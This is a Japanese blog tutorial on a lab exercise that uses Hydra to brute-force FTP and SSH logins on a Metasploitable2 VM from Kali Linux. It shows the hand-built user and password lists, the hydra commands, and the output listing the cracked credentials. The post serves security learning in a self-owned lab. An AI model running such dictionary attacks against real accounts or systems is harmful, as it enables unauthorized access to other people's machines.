Hydraを使った辞書攻撃でアカウント、パスワードをハッキング

セキュリティ
スポンサーリンク

1.目的

Hydraを使い、ターゲットマシンのFTPアカウントとSSHアカウントの
ユーザ名、パスワードを解析します。

基本的な攻撃の流れは以下の通りです。
1.情報調査ツールを使い、ターゲットの情報を収集 ←nmapで収集
2.空いているポートに対し攻撃          ←今回の実験

  nmapでの情報収集は以下の記事をご覧ください。


※注意事項※
このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。
他者の機器やネットワークで試すことは絶対にしないでください。
詳しくはこちら

2.Hydra

Hydraとは、オンラインでパスワードをクラックする有名なツールです。
SSHやFTPアカウント、Webサービスのログインフォームに対してクラッキングできます。

今回の実験は辞書リストを作成し、ターゲットマシンへ辞書攻撃を行います。

3.実験

攻撃用マシン(Kali Linux)からターゲットマシン(Metasploitable2)へ攻撃します。

3-1.実験環境

この実験における環境は、次の通りです。

・Kali Linux(攻撃用マシン)
名前:kali
IPアドレス:192.168.238.128/24

・Metasploitable2(ターゲットマシン)
名前:metasploitable
IPアドレス:192.168.238.130/24

※実験用マシンの準備は以下をご覧ください。

  ・攻撃用マシン(Kali Linux)の構築

  ・ターゲットマシン(Metasploitable2)の構築

3-2.実験の用意

Hydra使いFTPアカウントSSHアカウントを解析します。
まずは、ユーザリスト[user.lst]パスワードリスト[pass.lst]を作成します。

・ユーザリストを作成
攻撃用マシンのターミナルから以下コマンドを実行し、ユーザ名を記述していきます。

kali:~$ cat > user.lst
─$ cat > user.lst
root
sys
msfadmin
admin
user
service
postgres
tomcat
eido
  ←[ctrl]+[c]で抜ける



・パスワードリストを作成
攻撃用マシンのターミナルから以下コマンドを実行し、パスワードを記述していきます。

kali:~$ cat > pass.lst
─$ cat > pass.lst
user
password
12345678
msfadmin
root
guest
batman
asdfasdf
tomcat
eido
  ←[ctrl]+[c]で抜ける


実験の用意は以上です。

3-3.実験開始

・FTPアカウントを解析します。
攻撃用マシンのターミナルから以下コマンドを実行します。
※最後にターゲットIPとプロトコルを指定します。

kali:~$ hydra -L user.lst -P pass.lst -t 8 192.168.238.130 ftp

-L:ユーザリストを指定[user.lst]
-P:パスワードリストを指定[pass.lst]
-t:並列処理のタスク数を指定 ※デフォルトでは16ですが、ここでは8に下げました。

─$ hydra -L user.lst -P pass.lst -t 8 192.168.238.130 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 11:21:27
[DATA] max 8 tasks per 1 server, overall 8 tasks, 90 login tries (l:9/p:10), ~12 tries per task
[DATA] attacking ftp://192.168.238.130:21/
[21][ftp] host: 192.168.238.130   login: msfadmin   password: msfadmin
[21][ftp] host: 192.168.238.130   login: user   password: user
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 11:22:03

・結果
ユーザ名:msfadmin パスワード:msfadmin
ユーザ名:user パスワード:user

FTPアカウントを2つ解析できました。



・SSHアカウントを解析します
FTPの辞書攻撃と同じ書式ですが、並列処理数を4、最後のプロトコルをsshにします。

kali:~$ hydra -L user.lst -P pass.lst -t 4 192.168.238.130 ssh

また、プロトコルのポート番号が変更されている場合
次のような書式でも解析できます。

kali:~$ hydra -L user.lst -P pass.lst -t 4 ssh://192.168.238.130:22
─$ hydra -L user.lst -P pass.lst -t 4 192.168.238.130 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 11:25:14
[DATA] max 4 tasks per 1 server, overall 4 tasks, 90 login tries (l:9/p:10), ~23 tries per task
[DATA] attacking ssh://192.168.238.130:22/
[22][ssh] host: 192.168.238.130   login: sys   password: batman
[22][ssh] host: 192.168.238.130   login: msfadmin   password: msfadmin
[22][ssh] host: 192.168.238.130   login: user   password: user
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 11:25:50

・結果
ユーザ名:sys パスワード:batman
ユーザ名:msfadmin パスワード:msfadmin
ユーザ名:user パスワード:user

SSHアカウントを3つ解析できました。

実験は以上です。

4.まとめ

今回はオンラインパスワードクラックの実験を行いました。
ターゲットマシンは脆弱なアカウントを使っているため、辞書攻撃は約30秒程で終わり、
簡単なユーザ名、パスワードにしていると、すぐに解読されてしまうことがわかりました。

また、今回はリストを自作しましたが、Web上には有名な辞書ファイルがたくさんあります。
今回の実験を参考に、新しい実験を試してみてください。

参考サイト、文献

ハッキング ラボのつくりかた 仮想環境におけるハッカー体験学習

価格:6,335円
(2021/12/16 01:03時点)